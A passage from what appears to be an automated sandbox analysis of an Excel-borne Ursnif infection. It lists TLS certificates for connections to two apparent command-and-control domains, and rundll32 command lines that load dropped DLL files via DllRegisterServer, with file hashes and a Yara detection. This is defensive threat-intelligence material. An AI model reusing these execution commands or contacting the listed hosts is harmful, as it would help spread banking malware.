                                                                                                                                                                                        Apr 7, 2021 07:47:08.463172913 CEST5.100.155.169443192.168.2.349715CN=mail.ponchokhana.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 03 22:31:59 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 01 23:31:59 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                                        Apr 7, 2021 07:47:09.244162083 CEST50.116.95.68443192.168.2.349717CN=mail.springbedspetroleum.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Apr 02 00:17:53 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Thu Jul 01 00:17:53 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                        CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                        Statistics

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:07:46:59
                                                                                                                                                                                        Start date:07/04/2021
                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                        Imagebase:0x1210000
                                                                                                                                                                                        File size:27110184 bytes
                                                                                                                                                                                        MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:07:47:08
                                                                                                                                                                                        Start date:07/04/2021
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:rundll32 ..\fikftkm.thj,DllRegisterServer
                                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:07:47:09
                                                                                                                                                                                        Start date:07/04/2021
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:rundll32 ..\fikftkm.thj1,DllRegisterServer
                                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.304391933.00000000034D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:07:47:40
                                                                                                                                                                                        Start date:07/04/2021
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:rundll32 ..\fikftkm.thj2,DllRegisterServer
                                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:07:47:41
                                                                                                                                                                                        Start date:07/04/2021
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:rundll32 ..\fikftkm.thj3,DllRegisterServer
                                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        General

                                                                                                                                                                                        Start time:07:47:41
                                                                                                                                                                                        Start date:07/04/2021
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:rundll32 ..\fikftkm.thj4,DllRegisterServer
                                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                                        File size:61952 bytes
                                                                                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                        Reset < >